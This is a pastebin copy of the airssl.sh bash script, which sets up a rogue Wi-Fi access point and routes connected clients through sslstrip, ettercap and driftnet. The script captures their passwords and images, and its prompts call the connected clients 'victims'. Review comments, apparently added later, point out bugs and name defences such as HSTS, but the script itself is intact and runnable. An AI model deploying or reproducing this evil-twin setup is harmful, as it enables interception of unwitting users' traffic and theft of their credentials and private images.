
AirSSL 2.1 Updated 04/08/2013

a guest
Aug 4th, 2013
  1. #!/bin/bash
  2. # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
  3. # airssl.sh - v2.1
  4. # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
  5. # http://www.backtrack-linux.org/forums/showthread.php?t=28111
  6.  
  7.  
  8. # Network questions
      # Prints the IPv4 routes flagged UG (gateway routes) so the operator can read off
      # the gateway address and uplink interface, then collects four free-text answers:
      # gatewayip, internet_interface, fakeap_interface and ESSID.
      # NOTE(review): none of the four values is validated. They are later expanded into
      # airmon-ng, airbase-ng, iptables and driftnet command lines and into the generated
      # dhcpd.conf, in most places unquoted.
      # NOTE(review): read is used without -r, so backslashes typed in an answer are
      # interpreted rather than kept literally.
  9. echo
  10. echo "AIRSSL 2.1 - Credits killadaninja & G60Jon"
  11. echo
  12. route -n -A inet | grep UG
  13. echo
  14. echo
  15. echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
  16. read -e gatewayip
  17. echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
  18. read -e internet_interface
  19. echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
  20. read -e fakeap_interface
  21. echo -n "Enter the ESSID you would like your rogue AP to be called: "
  22. read -e ESSID
  23.  
  24. # Fake ap setup
      # Asks how airbase-ng should be launched (Y = operator-supplied switches plus the
      # chosen ESSID, N = chosen ESSID with -c 1, A = the "respond to all probes" mode
      # named in the prompt, which does not pass the ESSID), switches the wireless card
      # to monitor mode, and starts airbase-ng in its own xterm. The xterm's PID is kept
      # in fakeapid for the clean-up section.
      # Defender note: what nearby clients observe from this stage is an access point
      # advertising an operator-chosen network name. Wireless monitoring that flags
      # unknown BSSIDs announcing a known ESSID is the control that covers it.
  25. echo "[+] Configuring FakeAP...."
  26. echo
  27. echo "Airbase-ng will run in its most basic mode, would you like to
  28. configure any extra switches? "
  29. echo
  30. echo "Press 'Y' to see airbase-ng help and then add custom switches. "
  31. echo "Press 'N' to run airbase-ng in basic mode with your choosen ESSID. "
  32. echo "Press 'A' to run airbase-ng in respond to all probes modie. "
  33.  
  34. read -e ANSWER
  35.  
      # Monitor mode is enabled before the answer is checked, so the interface state has
      # already been changed by the time the "else" branch below is reached.
      # NOTE(review): the monitor interface name is hard-coded to mon0; nothing here
      # confirms that airmon-ng created an interface with that name.
  36. airmon-ng start $fakeap_interface
  37. fakeap=$fakeap_interface
  38. fakeap_interface="mon0"
  39.  
      # NOTE(review): $ANSWER is unquoted. An empty answer turns each test into "[ = y ]",
      # which fails with an error, so the script falls through to the else branch.
  40. if [ $ANSWER = "y" ] || [ $ANSWER = "Y" ] ; then
  41. airbase-ng --help
  42.  
  43. echo
  44. echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
  45. redefined, also in this mode you MUST define a channel "
  46. read -e aswitch
  47. echo
  48. echo "[+] Starting FakeAP..."
  49. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
      # Fixed delay instead of a readiness check; the same pattern follows every launch.
  50. sleep 2
  51.  
  52.  
  53. elif [ $ANSWER = "a" ] || [ $ANSWER = "A" ] ; then
  54. echo
  55. echo "[+] Starting FakeAP..."
  56. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
  57. sleep 2
  58.  
  59.  
  60. elif [ $ANSWER = "n" ] || [ $ANSWER = "N" ] ; then
  61. echo
  62. echo "[+] Starting FakeAP..."
  63. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
  64. sleep 2
  65.  
  66. else
      # NOTE(review): the message claims no system changes were made, but airmon-ng start
      # has already run above; this branch only stops mon0 and exits with the status of
      # that last command.
  67. echo "Next Time Choose one of the options!"
  68. echo "Exiting without making any system changes!"
  69. airmon-ng stop mon0
  70. exit
  71. fi
  72.  
  73.  
  74. # Dhcpd creation
      # Writes the dhcpd configuration used for clients of the fake AP: subnet
      # 10.0.0.0/24, leases from 10.0.0.20 to 10.0.0.50, 10.0.0.1 announced as both router
      # and DNS server, and the ESSID as the domain name.
      # NOTE(review): $ESSID is expanded outside the surrounding double quotes and written
      # into the file unescaped. It is therefore subject to word splitting and globbing,
      # and a double quote or semicolon in the name yields a malformed or altered
      # configuration.
      # NOTE(review): the file lives under /usr/share, is overwritten on every run, and is
      # never removed; neither mkdir nor the redirect is checked for failure.
      # Defender note: DHCP offers naming 10.0.0.1 as router and DNS server with this lease
      # range, on a network that normally uses different addressing, are an observable
      # sign of this setup.
  75. mkdir -p "/usr/share/airssl"
  76. echo "authoritative;
  77.  
  78. default-lease-time 600;
  79. max-lease-time 7200;
  80.  
  81. subnet 10.0.0.0 netmask 255.255.255.0 {
  82. option routers 10.0.0.1;
  83. option subnet-mask 255.255.255.0;
  84.  
  85. option domain-name "\"$ESSID\"";
  86. option domain-name-servers 10.0.0.1;
  87.  
  88. range 10.0.0.20 10.0.0.50;
  89.  
  90. }" > /usr/share/airssl/dhcpd.conf
  91.  
  92.  
  93. # IP Tables
      # Configures at0 as 10.0.0.1/24 with MTU 1400, flushes every rule and user-defined
      # chain in the filter and nat tables, enables IPv4 forwarding, and installs four
      # rules: DNAT of UDP seen in PREROUTING to the operator-supplied gateway, ACCEPT for
      # forwarded traffic entering on at0, MASQUERADE out of the uplink interface, and a
      # REDIRECT of TCP port 80 to local port 10000 (the port sslstrip is started on
      # later in the script).
      # at0 is not created anywhere in this script; presumably it is the tap interface
      # brought up by airbase-ng. Confirm before relying on it.
      # NOTE(review): the flushes discard whatever firewall rules the host already had.
      # They are not saved first and the clean-up section does not restore them.
      # NOTE(review): the FORWARD policy is set to ACCEPT here and never reset.
      # NOTE(review): the UDP DNAT rule has no interface or port match, so it applies to
      # all UDP traversing PREROUTING, not only to DNS from AP clients.
      # NOTE(review): $gatewayip and $internet_interface are expanded unquoted and
      # unvalidated, and no command's exit status is checked.
  94. echo "[+] Configuring forwarding tables..."
  95. ifconfig lo up
      # Backgrounded and followed by a fixed one-second sleep rather than a check that
      # the interface exists.
  96. ifconfig at0 up &
  97. sleep 1
  98. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  99. ifconfig at0 mtu 1400
  100. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  101. iptables --flush
  102. iptables --table nat --flush
  103. iptables --delete-chain
  104. iptables --table nat --delete-chain
  105. echo 1 > /proc/sys/net/ipv4/ip_forward
  106. iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
  107. iptables -P FORWARD ACCEPT
  108. iptables --append FORWARD --in-interface at0 -j ACCEPT
  109. iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
  110. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  111.  
  112. # DHCP
      # Starts dhcpd on at0 inside its own xterm, using /usr/share/airssl/dhcpd.conf
      # (-d -f keep the daemon in the foreground, logging to that window). The xterm's PID
      # is stored in dchpid, the spelling the clean-up section also uses.
      # NOTE(review): touch leaves an empty /var/run/dhcpd.pid behind; nothing in this
      # script removes it afterwards.
  113. echo "[+] Setting up DHCP..."
  114. touch /var/run/dhcpd.pid
  115. xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/usr/share/airssl/dhcpd.conf" at0 & dchpid=$!
  116. sleep 3
  117.  
  118. # Sslstrip
      # Starts sslstrip in its own xterm, listening on port 10000, the port that the nat
      # PREROUTING rule redirects TCP port 80 to. The xterm's PID is stored in sslstripid.
      # Defender note: this stage only sees requests a client sends over plain HTTP.
      # Sites that enforce HTTPS through HSTS (especially preloaded entries) and clients
      # configured to refuse http:// navigation never send such requests, which is why
      # those controls are the standard mitigation for this class of downgrade.
  119. echo "[+] Starting sslstrip..."
  120. xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -k -l 10000 & sslstripid=$!
  121. sleep 2
  122.  
  123. # Ettercap
      # Starts ettercap on at0 in a scrollback-enabled xterm and stores the xterm's PID in
      # ettercapid. The default branch writes to /pentest/wireless/airssl/passwords; the
      # Y branch drops that -w option and passes the operator's answer instead.
      # NOTE(review): both reads lack -r and $ETTER is tested unquoted, so an empty answer
      # produces a test error and falls through to the default branch.
      # NOTE(review): whatever ettercap records is written to a fixed path. The script
      # never sets permissions on that file and never removes it, so captured data stays
      # on disk after clean-up. For an authorised assessment that output needs explicit
      # handling and deletion.
  124. echo "[+] Configuring ettercap..."
  125. echo
  126. echo "Ettercap will run in its most basic mode, would you like to
  127. configure any extra switches for example to load plugins or filters,
  128. (advanced users only), if you are unsure choose N "
  129. echo "Y or N "
  130. read ETTER
  131. if [ $ETTER = "y" ] || [ $ETTER = "Y" ] ; then
  132. ettercap --help
  133.  
  134. echo " "
  135. echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
  136. For the sake of airssl, ettercap WILL USE -u and -p so you are advised
  137. NOT to use -M, also -i is already set and CANNOT be redifined here.
  138. Ettercaps output will be saved to /pentest/wireless/airssl/passwords
  139. DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
  140. echo
  141. read "eswitch"
  142. echo "[+] Starting ettercap..."
  143. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
  144. sleep 1
  145.  
  146. else
  147.  
  148. echo
  149. echo "[+] Starting ettercap..."
  150. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
  151. sleep 1
  152. fi
  153.  
  154. # Driftnet
      # Optionally starts driftnet on the uplink interface, saving what it extracts under
      # /pentest/wireless/airssl/driftnetdata. Its PID is stored in dritnetid; the
      # clean-up section uses the same misspelt name, so the two match.
      # NOTE(review): when the answer is anything other than y/Y, dritnetid is never
      # assigned, yet clean-up still runs kill on it.
      # NOTE(review): $DRIFT and $internet_interface are unquoted and read lacks -r.
      # NOTE(review): the saved files are never removed by this script, the same
      # retention concern as for the ettercap output.
  155. echo
  156. echo "[+] Driftnet?"
  157. echo
  158. echo "Would you also like to start driftnet to capture the victims images,
  159. (this may make the network a little slower), "
  160. echo "Y or N "
  161. read DRIFT
  162.  
  163. if [ $DRIFT = "y" ] || [ $DRIFT = "Y" ] ; then
  164. mkdir -p "/pentest/wireless/airssl/driftnetdata"
  165. echo "[+] Starting driftnet..."
  166. driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
  167. sleep 3
  168. fi
  169.  
  170. xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
  171.  
  172. clear
  173. echo
  174. echo "[+] Activated..."
  175. echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
  176. echo
  177. echo "[+] IMPORTANT..."
  178. echo "After you have finished please close airssl and clean up properly by pressing any key,
  179. if airssl is not closed properly ERRORS WILL OCCUR "
  180. echo " "
  181. read WISH
  182.  
  183. # Clean up
      # Kills the helper processes by the PIDs recorded earlier, stops monitor mode on
      # mon0 and on the original wireless interface, writes 0 to ip_forward, and flushes
      # the filter and nat tables again.
      # NOTE(review): [ -n $WISH ] is unquoted. With an empty answer it collapses to
      # "[ -n ]", which is true, so this block runs whatever was typed. Quoting the
      # variable would change that behaviour.
      # NOTE(review): the script sets no trap, so this section is reached only through
      # the read above; an interrupt or a closed terminal skips all of it and leaves
      # forwarding, the nat rules and the helper processes in place.
      # NOTE(review): state that is not put back includes the host's earlier iptables
      # rules, the FORWARD policy (left at ACCEPT), the earlier ip_forward value (forced
      # to 0 whatever it was), /usr/share/airssl/dhcpd.conf, /var/run/dhcpd.pid and the
      # capture files under /pentest/wireless/airssl.
  184. if [ -n $WISH ] ; then
  185. echo
  186. echo "[+] Cleaning up airssl and resetting iptables..."
  187.  
      # Except for driftnet, these are the PIDs of the xterm windows, not of the tools
      # started inside them. dritnetid is empty when driftnet was not selected, in which
      # case that kill is called without a PID.
  188. kill ${fakeapid}
  189. kill ${dchpid}
  190. kill ${sslstripid}
  191. kill ${ettercapid}
  192. kill ${dritnetid}
  193. kill ${sslstriplogid}
  194.  
      # fakeap_interface was reassigned to "mon0" earlier; fakeap holds the name the
      # operator originally entered.
  195. airmon-ng stop $fakeap_interface
  196. airmon-ng stop $fakeap
  197. echo "0" > /proc/sys/net/ipv4/ip_forward
  198. iptables --flush
  199. iptables --table nat --flush
  200. iptables --delete-chain
  201. iptables --table nat --delete-chain
  202.  
      # Printed unconditionally; no exit status above is checked.
  203. echo "[+] Clean up successful..."
  204. echo "[+] Thank you for using airssl, Good Bye..."
  205. exit
  206.  
  207. fi
  208. exit